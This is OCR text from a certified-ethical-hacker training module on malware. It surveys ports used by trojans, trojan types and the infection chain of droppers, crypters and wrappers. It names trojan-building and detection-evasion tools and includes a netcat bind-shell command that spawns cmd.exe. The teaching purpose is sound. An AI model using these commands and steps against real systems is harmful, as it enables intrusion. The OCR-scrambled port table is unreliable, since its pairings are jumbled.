Common Ports used by Trojans Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems. Users need a basic understanding of the state of an "active connection” and ports commonly used by Trojans to determine whether a system has been compromised. Among the various states, the “listening” state is the important one in this context. The system generates this state when it listens for a port number while waiting to connect to another system. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for "listening" and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below. Port 2

20/22/80/ 443 21/3024/

4092/5742

Trojan Death

Emotet WinCrash

intras

Port 5001/50505 |

5321 5400-02

Trojan Sockets de Troie

FireHotcker Blade Runner/Blade

Runner 0.80 Alpha

Blade Runner, Doly Trojan, Fore, 21

Invisible FTP, WebEx, WinCrash,

5569

Robo-Hack

DarkFTP 22

Shaft, SSH RAT, Linux Rabbit

6267

GW Girl

23

Tiny Telnet Server, EliteWrap

6400

Thing

Module 07 Page 974

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Port

Trojan

Port

Trojan

6666

KilerRat, Houdini RAT

Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Haebu

25

Coceda, Shtrilitz Stealth, Terminator,

Kuang2 0.17A-0.30, Jesrto, Lazarus

Group, Mis-Type, Night Dragon 26 31/456

BadPatch

6667/12349 |

Hackers Paradise

6670-71

Bionet, Magic Hound

DeepThroat

Denis, Ebury, FIN7, Lazarus Group,

53 68

RedLeaves, Threat Group-3390, Tropic

6969

GateCrasher, Priority

Mspy

7000

Remote Grab

Trooper

Necurs, NetWire, Ismdoor, Poison Ivy, Executer, Codered, APT 18, APT 19, APT 32, BBSRAT, Calisto, Carbanak, Carbon,

80

Comnie, Empire, FIN7, InvisiMole,

Lazarus Group, MirageFox, Mis-Type, Misdat, Mivast, MoonWind,

Dragon, POWERSTATS,

Shiver

139 421

NetMonitor

Night

RedLeaves, S-

Type, Threat Group-3390,

113

7300-08

UBoatRAT

7300/31338

731339

| Net Spy

Nuker, Dragonfly 2.0

7597

Qaz

TCP Wrappers Trojan

7626

Gdoor

7777

GodMsg

7789

ICKiller

ADVSTORESHELL , APT 29, APT 3, APT 33, AuditCred, BADCALL, BBSRAT, Bisonal, Briba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire,

443

FELIXROOT, FIN7, FIN8 , ghOst RAT, HARDRAIN, Hi-Zor, HOPLIGHT, KEYMARBLE, Lazarus Group, LOWBALL, Mis-Type, Misdat, MoonWind,

Naid,

Nidiran, Pasam, PlugX, PowerDuke,

POWERTON,

Proxysvc, RATANKBA,

RedLeaves, S-Type, TEMP.Veles , Threat

Group-3390, TrickBot, Tropic Trooper, TYPEFRAME,

445

Module 07 Page 975

UBoatRAT

WannaCry, Petya, Dragonfly 2.0

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Port

Trojan

Port

Trojan

456

Hackers Paradise

8000

BADCALL, Comnie,

555

Ini-Killer, Phase Zero, Stealth Spy

8012

Volgmer Ptakks

Zeus, APT 37, Comnie, EvilGrab, FELIXROOT, FIN7, HTTPBrowser, 666

Satanz Backdoor, Ripper

8080

Lazarus Group, Magic Hound, OceanSalt, SType, Shamoon, TYPEFRAME, Volgmer

.

1001

Silencer, WebEx

1011

Doly Trojan

8443 8787/54321

FELIXROOT, Nidiran,

TYPEFRAME

BackOfrice 2000

1026/ 64666

RSM

9989

ene ge iNi-Killer

1095-98

RAT

10048

Delf

1170

Psyber Stream Server, Voice

10100

Gift

1177

njRAT

10607

Coma

1234

Ultors Trojan

11000

Senna Spy

1234/ 12345

. Valvo line

11223

. . Progenic Trojan

1243

SubSeven 1.0 -1.8

12223

Hack’99 KeyLogger

1243/6711 /6776/273 74

Sub Seven

1245

VooDoo Doll

4777

12345-46 12361,

1.0.9

GabanBus,

NetBus

12362

Whack-a-mole

Java RAT, Agent.BTZ/ComRat, Adwind RAT

16969

Priority

1349

Back Office DLL

20001

Millennium

1492

FTPSO9CMP.

Module 07 Page 976

20034/1120

NetBus 2.0, BetaNetBus 2.01

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Port

Trojan

Port

1433

Misdat

21544

GirlFriend 1.0, Beta-1.35

1600

Shivka-Burka

el

Prosiak

1604

DarkComet RAT, Pandora RAT, HellSpy RAT

22222

Rux

1807

SpySender

23432

Asylum

1863

XtremeRAT

23456

Evil FTP, Ugly FTP

1981

Shockrave

25685

Moon Pie

1999

BackDoor 1.00-1.03

26274

Delta

2001

Trojan Cow

30100-02

NetSphere 1.27a

2115

Bugs

31337-38

reo /ben sO Orifice

2140

The Invasor

31338

DeepBO

2140/3150

DeepThroat

31339

NetSpy DK

2155

Illusion Mailer, Nirvana

31666

BOWhack

2801

Phineas Phucker

34324

BigGluck, TN

3129

Masters Paradise

40412

The Spy

3131

SubSari

3150

The Invasor

47262

Delta

3389

RDP

50766

Fore

Portal of Doom

53001

Remote

4000

RA

54321

SchoolBus .69-1.11 /

4567

File Nail 1

61466

Telecommando

Seite

40421-26

Trojan

Masters Paradise

Windows

7/10167

Module 07 Page 977

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats Port

Exam 312-50 Certified Ethical Hacker

Trojan

4590

ICQTrojan

5000

Bubbel, SpyGate RAT, Punisher RAT

Port 65000

Trojan Devil

Table 7.1: Trojans and corresponding port of attack

Module 07 Page 978

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Types of Trojans

CE H

@ Trojans are categories according to their functioning and targets

‘@ Some of the example includes:

oO

Point-of-Sale Trojans

Security Disabler Software Trojans

Backdoor Trojans

Defacement Trojans

Destructive Trojans

Botnet Trojans

Service Protocol Trojans

DDoS Attack Trojans

Rootkit Trojans

Mobile Trojans

Command Shell Trojans

E-Banking Trojans

loT Trojans

1 |

Remote Access Trojans

|2 |

G

Types of Trojans Trojan are classified into many categories depending on the exploit functionality targets. Some Trojans types are listed below: 1.

Remote Access Trojans

8.

Service Protocol Trojans

2.

Backdoor Trojans

9.

Mobile Trojans

3.

Botnet Trojans

10. loT Trojans

4.

Rootkit Trojans

11. Security Software Disabler Trojans

5.

E-Banking Trojans

12. Destructive Trojans

6.

Point-of-Sale Trojans

13. DDoS Attack Trojans

7.

Defacement Trojans

14. Command Shell Trojans

Remote Access Trojans Remote access Trojans (RATs) provide attackers with full control over the victim’s system, thereby enabling them to remotely access files, private conversations, accounting data, etc. The RAT acts as a server and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the user is behind a firewall on the network, it is less likely that a remote attacker will connect to the Trojan. Attackers in the same network located behind the firewall can easily access Trojans. For example, Jason is an attacker who intends to exploit Rebecca’s computer to steal her data. Jason infects Rebecca’s computer with server.exe and plants a reverse connecting Trojan. The Trojan connects through Port 80 to the attacker, establishing a reverse connection. Now, Jason has complete control over Rebecca’s machine. Module 07 Page 979 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Jason Attacker

Rebecca Victim Infected with RAT Trojan

Attacker gains 100% (complete) access to the system

Figure 7.5: Working of Remote Access Trojan

Attackers use RATs to infect the target machine to gain administrative access. RATs help an attacker to remotely access the complete GUI and control the victim’s computer without his or her

awareness.

keylogging, via phishing networked commands, webcams.

=

Moreover,

they

can

perform

screen

and

camera

capture,

code

execution,

file access, password sniffing, registry management, and so on. They infect victims attacks and drive-by downloads, and they propagate through infected USB keys or drives. They can download and execute additional malware, execute shell read and write registry keys, capture screenshots, log keystrokes, and spy on

njRAT njRAT is a RAT with powerful data-stealing capabilities. In addition to logging keystrokes, it can access a victim's camera, stealing credentials stored in browsers, uploading and downloading files, performing process and file manipulations, and viewing the victim's desktop. This RAT can be used to control botnets (networks of computers), thereby allowing the attacker to update, uninstall, disconnect, restart, and close the RAT, and rename its campaign ID. The attacker can further create and configure the malware to spread through USB drives with the help of the command-and-control server software. Features:

o

Remotely access the victim’s computer

o

Collect victim’s information such as IP address, hostname, and OS.

o

Manipulate files and system files

o

Open an active remote session providing the attacker access to the command line of the victim’s machine

co

Log keystrokes and steal credentials from browsers

Module 07 Page 980

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Instat Date | Flag | Country

Settings | [About

Figure 7.6: Screenshot of njRAT Some additional RATs are as follows: =

ProRat

=

FatalRAT

=

Theef

=

TeaBot

=

JSSLoader

=

FlawedAmmyy

=

CrimsonRAT

=

Ismdoor

=

MINEBRIDGE

=~

Kedi RAT

=

StrRAT

=

PCRat/ GhOst RAT

Backdoor Trojans A backdoor is a program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim’s computer or network. The difference between this type of malware and other types of malware is that the installation of the backdoor is performed without the user’s knowledge. This allows the attacker to perform any activity on the infected computer, such as transferring, modifying, or corrupting files, installing malicious software, and rebooting the machine, without user detection. Backdoors are used by attackers for uninterrupted access to the target machine. Most backdoors are used

Module 07 Page 981 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

for targeted attacks. Backdoor Trojans are often used to group victim computers botnet or zombie network that can be used to perform criminal activities.

to form a

Backdoor Trojans are often initially used in the second (point of entry) or third (command-andcontrol

[C&C]) stage of the targeted attack process. The main difference between

a RAT and a

traditional backdoor is that the RAT has a user interface, i.e., the client component, which can be used by the attacker to issue commands to the server component residing in the compromised machine, whereas a backdoor does not.

For example, a hacker who is performing a malicious activity identifies vulnerabilities in a target network. The hacker implants the networkmonitor.exe backdoor in the target network, and the backdoor will be installed in a victim’s machine on the target network without being detected by network security mechanisms. Once installed, networkmonitor.exe will provide the attacker with uninterrupted access to the victim’s machine and the target network. =

Poisonivy

Poisonlvy gives the attacker practically complete control over the infected computer. The Poisonlvy remote administration tool is created and controlled by a Poisonlvy management program or kit. The Poisonlvy kit consists of a graphical user interface, and the backdoors are small (typically,

Trojan passes through

Victim

HTTP reply

Server

Figure 7.18: Working of HTTP Trojan

o

SHTTPD

SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it will turn a computer into an invisible web server. For instance, an attacker connects to the victim using web browser http://10.0.0.5:443 and infects the victim’s computer with chess.exe, with Shttpd running in the background and listening on port 443 (SSL). Module 07 Page 993 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Attacker

Normally Firewall allows

IP: 10.0.0.5:443

you through port 443

Victim

Encrypted Traffic

IP: 10.0.0.8:443

Figure 7.19: SHTTPD attack process

o

HTTP RAT

HTTP RAT uses web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous as they work nearly ubiquitously where the Internet can be accessed.

Features o

Displays ads and records personal data/keystrokes

o

Downloads unsolicited files and disables programs/system

o

Floods Internet connection and distributes threats

o

Tracks browsing activities and hijacks Internet browser

o.

Makes fraudulent claims about spyware detection and removal i

f@ HTTP RAT O31

ind plant HTTP Trojan The Trojan sends an email with the location of an IP address v2)

‘ae vesontawe [OT ) sain & tendrawth '0 mat rtsabe: ten MIP seve & seg ‘can abel seve ster dedi sour enol hess Prsvoicn F coveFeewal sare gatfo0 Coste

Connect to the IP address using a browserto port 80

>

a

Victim

Generates using HTTP RAI

Attacker Figure 7.20: Working of HTTP RAT Trojan

=

ICMP Trojans

The Internet Control Message Protocol (ICMP) is an integral part of IP, and every IP module must implement it. It is a connectionless protocol that provides error messages to unicast addresses. The ICMP protocol encapsulates the packets in IP datagrams. Module 07 Page 994

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

An attacker can hide the data using covert channels methods in a protocol that is undetectable. The concept of ICMP tunneling allows one protocol to be carried over another protocol. ICMP tunneling uses ICMP echo request and reply to carry a payload and stealthily access or control the victim’s machine. Attackers can use the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary information tunneling. Network layer devices and proxy-based firewalls do not filter or inspect the contents of ICMP_ECHO traffic, making the use of this channel attractive to hackers. Attackers simply pass, drop, or return the ICMP packets. The Trojan packets themselves masquerade as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. ICMP Client (Command. icmpsend

Command Prompt

)

ICMP Server (Command. icmpsrv

x)

-install)

Command Prompt

‘Commands are sent using ICMP protocol

Figure 7.21: Working of ICMP Trojan

Mobile Trojans Mobile Trojans are malicious software that target mobile phones. Mobile increasing rapidly due to the global proliferation of mobile phones. The victim into installing the malicious application. When the victim downloads the Trojan performs various attacks such as banking credential stealing, credential stealing, data encryption, and device locking. =

Trojan attacks are attacker tricks the the malicious app, social networking

BasBanke BasBanke is a Trojan family that runs on Android. The Trojan was first identified in 2018 during the Brazilian elections, registering over 10,000 installations as of April 2019 from the official Google Play Store alone. It is a banking Trojan, and when it infects a device, it will perform keystroke logging, screen recording, SMS interception, and theft of credit card and financial information. To trick users into downloading this Trojan, the Trojan creators advertised it via WhatsApp and Facebook messages. The most widely spread and downloaded malicious version of BasBanke is the fake CleanDroid Android app. CleanDroid projects itself as a mobile junk cleaning and memory boosting app; however, it is actually a banking Trojan.

Module 07 Page 995

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

QOS

a

O | @ ttips://mfacebookcom

iy

Clean Droid

Patrocinado

B 2% 03:42

@

:

foe



QOS 4

B 2%

Google Play

03:24

Q

CleanDroid

@

MatriFOT

Artee design | | Numero8: Em alta

100% Gratis esse APP promete até 70% em economia

de dados 36/46, protege seus arquivos contra virus, otimiza seu celular limpando arquivos que provocam a lentidao. CleanDroid é um salva-vidas para aqueles que adoram misica e video, enviam muitas mensagens e trabalham em aplicagdes em seus celulares Android. Nao perca tempo baixe e confira

INSTALAR

46%

ag

‘Mavaliagbes

Mais q

Classificago Live ©

Dow

CleanDroid cleandroid.gplay.services CleanDroid - Unico CleanDroid - Unico Aplicativo de seguranca reco.

ooe« curtir

6 compartilhamentos Compartilhar

&

Somos 0 tinico aplicativo que possui mais recursos

Figure 7.22: Screenshot of BasBanke Mobile Trojan

Some additional mobile Trojans are as follows: =

Agent Smith

=

Asacub

=

Hiddad

=

Gustuff

=

AndroRAT

=

GriftHorse

=

Rotexy

=

Vultur

=

Gplayed

loT Trojans

Internet of things (loT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. loT Trojans are malicious programs that attack loT networks. These Trojans leverage a botnet to attack other machines outside the loT network. =

Mirai

Mirai is a self-propagating loT botnet that infects poorly protected Internet devices (loT devices). Mirai uses telnet port (23 or 2323) to find those devices that are still using their factory default username and password. Most loT devices use default usernames and passwords. Mirai can infect such insecure devices (bots) and co-ordinate them to mount a DDoS attack against a chosen victim. Module 07 Page 996

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Features:

o

Login attempts with 60 different factory default username and password pairs

o

Built for multiple CPU architectures (x86, ARM, Sparc, PowerPC, Motorola)

o

Connects to C&C to allow the attacker to specify an attack vector

o

Increases bandwidth usage for infected bots

o

Identifies and removes competing malware

o

Blocks remote administration ports

Figure 7.23: Screenshot displaying Mirai DDoS attack botnet Trojan Prevention: o

Using anti-Trojan software and updating Mirai DDoS botnet Trojan attacks.

usernames

and

passwords

can

prevent

Some additional loT Trojans are as follows: =

Silex BrickerBot

=

Gafgy Botnet

=

Satori

=

Katana

=

Torii botnet

=

BotenaGo

=

Miori loT Botnet

=

Ttint

=

Bashlite loT Malware

=

Dark Nexus

Module 07 Page 997

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Security Software Disabler Trojans Security software disabler Trojans stop the working of security programs such as firewalls, and IDS, either by disabling them or killing the processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system. Some security software disabler Trojans are as follows:

=

CertLock

=

GhostHook

=

Trojan.Disabler

Destructive Trojans

The sole may not randomly resulting

purpose of a destructive Trojan is to delete files on a target system. Antivirus software detect destructive Trojans. Once a destructive Trojan infects a computer system, it deletes files, folders, and registry entries as well as local and network drives, often in OS failure.

Destructive Trojans are written as simple crude batch files with commands such as "DEL," "DELTREE," or "FORMAT." This destructive Trojan code is usually compiled as .ini, .exe, .dll, or .com files. Thus, it is difficult to determine if a destructive Trojan causes a computer system infection. The attacker can activate these Trojans or they can be set to initiate at a fixed time and date. Shamoon is still considered as the most destructive Trojan. Shamoon uses a Disttrack payload that is configured to wipe systems as well as virtual desktop interface snapshots. This Trojan propagates internally by logging in using legitimate domain account credentials, copying itself to the system, and creating a scheduled task that executes the copied payload. Other currently prevalent destructive Trojans include Dimnie, GreyEnergy, Killdisk, HermeticWiper, WhisperGate, and FoxBlade. DDoS Trojans These Trojans are intended to perform DDoS attacks on target machines, networks, or web addresses. They make the victim a zombie that listens for commands sent from a DDoS Server on the Internet. There will be numerous infected systems standing by for a command from the server, and when the server sends the command to all or a group of the infected systems, since all the systems perform the command simultaneously, a considerable amount of legitimate requests flood the target and cause the service to stop responding. In other words, the attacker, from his/her computer along with several other infected computers, sends multiple requests to the victim and overwhelm the target, leading to a DoS. This can also be achieved by mass spam emails.

Mirai loT botnet Trojan is still considered as one of the most notorious DDoS attack Trojans. Other recently discovered DDoS attack Trojans that have affected a large number of systems and networks and caused major disruptions in businesses include Electrum DDoS botnet and Bushido Botnet. All these DDoS Trojans have similar attack strategies. They identify the

Module 07 Page 998

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

unsecured devices in a network and enslave them to launch a DDoS attack on the victim’s machine. Once installed on a Windows computer, the Trojan connects to a command-andcontrol (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports. Along with the infected botnet zombies, it performs DDoS attacks in which a zombie floods a target server/machine with malicious traffic. Command Shell Trojans A command shell Trojan provides remote control of a command shell on a victim’s machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim’s machine. Netcat, DNS Messenger, GCat are some of the command shell Trojans.

C:> ne

ED" El»

C:> ne -L -p -t

-e

cmd.exe

Figure 7.24: Working of Command Shell Trojan

Module 07 Page 999

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

How to Infect Systems Using a Trojan STEP STEP STEP STEP STEP STEP

Attacker i Fee Trojan

Packet

1: 2: 3: 4: 5: 6:

CE H

Create a new Trojan packet Employa dropper or downloader to install the malicious code on the target system Employa wrapperto bind the Trojanto a legitimate file Employa crypter to encrypt the Trojan Propagate the Trojan by various methods Deploy the Trojan on the victim's machine by executing dropper or downloader on the target machine

STEP 7: Execute the damage routine Dropper

Downloader

2

Wrapper

Calc.exe i)

Victim's Machine

Crypter

Propagate

Deploy

Damage Routine

Copyright © by

How to Infect Systems Using a Trojan An attacker can remotely control the system

hardware

and software by installing a Trojan on

the system. Once the Trojan is installed on the system, the data become vulnerable to threats. In addition, the attacker can perform attacks on third-party systems.

Attackers deliver Trojans in many ways to infect target systems:

Trojans are included in bundled shareware or downloadable software. download such files, the target systems automatically install the Trojans.

When

users

Different pop-up ads try to trick users. They are programmed by the attacker such that regardless of whether users click YES or NO, a download will begin and the Trojan will automatically install itself on the system. Attackers send the Trojans as email attachments. When attachments, the Trojans are automatically installed.

users open

these

malicious

Users are sometimes tempted to click on different types of files, such as greeting cards, porn videos, and images, which might contain Trojans. Clicking on these files installs the Trojans. Attackers infect a target machine using a Trojan in the following steps: Step 1: Create a new Trojan packet using various tools such as Trojan Horse Construction Kit, Social Engineering Toolkit (SET), and Beast. New Trojans have a higher chance of succeeding in compromising the target system, as the security mechanisms might fail to detect them. These Trojans can be transferred to the victim’s machine using a dropper or downloader.

Module 07 Page 1000

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Step 2: Employ a dropper or a downloader to install the malicious code on the target system. The dropper appears to users as a legitimate application or a well-known and trusted file. However, when it is run, it extracts the malware components hidden in it and executes them, usually without saving them to the disk, to avoid detection. Droppers include images, games, or benign messages in their packages, which serve as a decoy to divert users’ attention from malicious activities. Downloaders are malware transporters that do not contain the actual malware file; however, they contain the link from where the actual Trojan can be downloaded. When a downloader is executed on the target machine, it connects back to the attacker’s server and downloads the intended Trojan on the victim’s machine. Droppers can easily evade firewalls; however,

a downloader can be detected with the help of network analyzer tools. =

Step 3: Employ a wrapper such as petite.exe, Graffiti.exe, IExpress Wizard, or eLiTeWrap to help bind the Trojan executable to legitimate files to install it on the target system.

=

Step 4: Employ a crypter such as BitCrypter to encrypt the Trojan to evade detection by firewalls/IDS.

=

Step 5: Propagate the Trojan by implementing various methods

such as sending it via

overt and covert channels, exploit kits, emails, and instant messengers, thereby tricking users into downloading and executing it. An active Trojan can perform malicious activities such as irritating users with constant pop-ups, changing desktops, changing or deleting files, stealing data, and creating backdoors. =

Step 6: Deploy the Trojan on the victim’s machine by executing the dropper or downloader software to disguise it. The deployed file contains wrapped and encrypted malware.

=

Step 7: Execute the damage routine. Most malware contain a damage routine that delivers payloads. Some payloads just display images or messages, whereas others can even delete files, reformat hard drives, or cause other damage. The damage routine can also include malware beaconing.

Crypter

Propagate

Deploy

Victim’s Machine Damage Routine

Figure 7.25: Diagram showing the complete process involved in infecting target machine using Trojan

Module 07 Page 1001 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Creating a Trojan

CEH

@ Trojan Horse construction kits help attackers to construct Trojan horses of their choice @ The tools in these kits can be dangerous and can backfire if not properly executed

DarkHorse Trojan Virus Maker ——_— DarkHorse Trojan virus maker creates user-specified Trojans by selecting from various options (> Doone Tjon Vos Moker 1.2)

Trojan Horse Construction Kits

@ Trojan Horse Construction Kit

Tan Vi Make I Yieboam Shearing

© Senna Spy Trojan Generator

7

a

Ii Her Computer

© Batch Trojan Generator

© Umbra Loader- Botnet Trojan Maker

N

;

[cet (reste Astecri As Textee | Copyright © by

Al Rights Reserved Reproduction i

Creating a Trojan Attackers can create Trojans using various Trojan horse construction Trojan Virus Maker, and Senna Spy Trojan Generator.

kits such as DarkHorse

Trojan Horse Construction Kit

Trojan horse construction kits help according to their needs. These tools New Trojans created by attackers scanning tools, as they do not match to succeed in launching attacks.

Module 07 Page 1002

attackers construct Trojan horses and customize them are dangerous and can backfire if not properly executed. remain undetected when scanned by virus- or Trojanany known signatures. This added benefit allows attackers

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

DarkHorse Trojan Virus Maker DarkHorse Trojan Virus Maker is used to create user-specified Trojans via selection from a variety of available options. The Trojans are created to act according to these selected options. For example, if you choose the option Disable Process, the Trojan disables all processes on the target system. The figure below shows a snapshot of DarkHorse Trojan Virus Maker with its various available options.

| x|

(> DarkHorse Trojan Virus Maker 1.2)

tart Button Mar

Figure 7.26: Screenshot of DarkHorse Trojan Virus Maker

Some additional Trojan horse construction kits are as follows: =

Trojan Horse Construction Kit

=

Senna Spy Trojan Generator

=

Batch Trojan Generator

=

Umbra Loader - Botnet Trojan Maker

Module 07 Page 1003

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Employing a Dropper or Downloader

CE H

Droppers

Downloaders

|@ Dropper is used to camouflage the malware payloads that can impede the functioning of the targeted systems

@ Downloader is a program that can download and install harmful programs like malware

‘@

‘@

Dropper consists of one or more types of

malware features that can make it

as dropper does, so there is the possibility for

a new unknown downloader to pass through

undetectable by antivirus software; also the

the anti-malware scanner

installation process can be done stealthy @

Downloader does not carry malware of itself

@ Godzilla Downloader, Trojan.Downloader,

Emotet dropper, Dridex dropper, Gymdrop,

W97M.Downloader, and

and Anatsa are some of the famous droppers that attackers employ for deploying malware to the target machine

ISB.Downloader!gen309 are some of the famous downloaders that attackers employ for deploying malware to the target machine

Employing a Dropper or Downloader After constructing their intended Trojans, attackers can employ a dropper or a downloader to transmit the Trojan package to the victim’s machine.

Droppers Droppers are programs that are used to camouflage malware payloads that can impede the functioning of thetargetsystem.The dropper consists of one or more types of malware

features that

can

make

it

undetectable

by

antivirus

software;

moreover,

the

installation process can be stealthily performed. The dropper is executed by simply loading its own code into the memory, and the malware payload is then extracted and written into the file system. Next, the malware installation process is initiated, and the payload is executed. Emotet, Dridex, Gymdrop, and Anatsa are deploying malware on the target machine.

well-known

droppers

that

attackers

employ

for

Downloaders A downloader is a program that can download and install harmful programs such as malware. Downloaders are similar to droppersto a certain extent. However, the main difference is that

a downloader does not carry malware itself whereas a dropper does; hence, it

is possible for a new unknown downloader to pass through the anti-malware scanner. Attackers use downloaders as part of the payload or other harmful programs that can drop and stealthily install the malware. Downloaders are spread as camouflaged files attached in emails, and the attached programs pose as legitimate programs such as accounts.exe or invoices.

Module 07 Page 1004

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

When the victim opens the attached infected file, the downloader tries to contact the remote server for directly fetching other malicious programs. Godzilla downloader, Trojan.Downloader, W97M.Downloader, and ISB.Downloader!gen309 are some well-known downloaders that attackers employ for deploying malware on the target machine.

Module 07 Page 1005 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Employing

a Wrapper

|

© Awrapperbindsa Trojan executable with genuine looking .EXE applications, aa such as games or office applications ©@ When the user runs the wrapped .EXE, itfirst installs the Trojanin the background and then runs the wrapping application in the foreground @ Attackers might send a birthday greeting that will install a Trojanas the user watches, for example, a birthday cake dancingacross the screen Express

@

Wizard

5 opr Wcwt

x

‘Welcome to [Express 2.0

¥: Trojan.exe ~~ fie ste 20

Wrappers

Express Wizard wrapper

Tia wdasecov you cede enag/ Ber Pe

© eLiTeWrap

a self-extracting package

Pisa

@ Advanced File Joiner

guides the user to create that can automatically install the embedded

setup files, Trojans, etc.

nef dnetisancOoetacargse chon,”

maaaoan

© Opened Se Etec Ds f:

© Soprano 3

a

Ts]

cot

© Exe2vbs © Kriptomatik

oe

Aa 2? wp

Employing a Wrapper Wrappers bind the Trojan executable with.EXE applications that appear genuine, such as games or office applications. When the user runs the wrapped .EXE application, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) at run time. Thus, it is possible for the Trojan to get in virtually undetected, as most antivirus software cannot detect the signatures in the file.

The attacker can also place several executables inside one executable. These wrappers may also support functions such as running one file in the background and another one on the desktop. Technically speaking, wrappers are a type of “glueware” used to bind other software components together. A wrapper encapsulates several components into a single data source to make it usable in a more convenient manner compared to the original unwrapped source.

The lure of free software can trick users into installing Trojan horses. For instance, a Trojan horse might arrive in an email described as a computer calculator. When the user receives the email, the description of the calculator may lead him/her to install it. Although it may, in fact, be a default application, once the user installs the application file, the Trojan is installed in the background and it will perform other actions that are not readily apparent to the user, such as deleting files or emailing sensitive information to the attacker. In another instance, an attacker

sends a birthday greeting that will install dancing across the screen.

Module 07 Page 1006

a Trojan as the user watches, e.g., a birthday cake

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

x

Trojan.exe File size: 20K

v

Calc.exe ile size:90K

«===

«

File size: 110K

Figure 7.27: Example of Wrapper

Covert Wrapper Programs

=

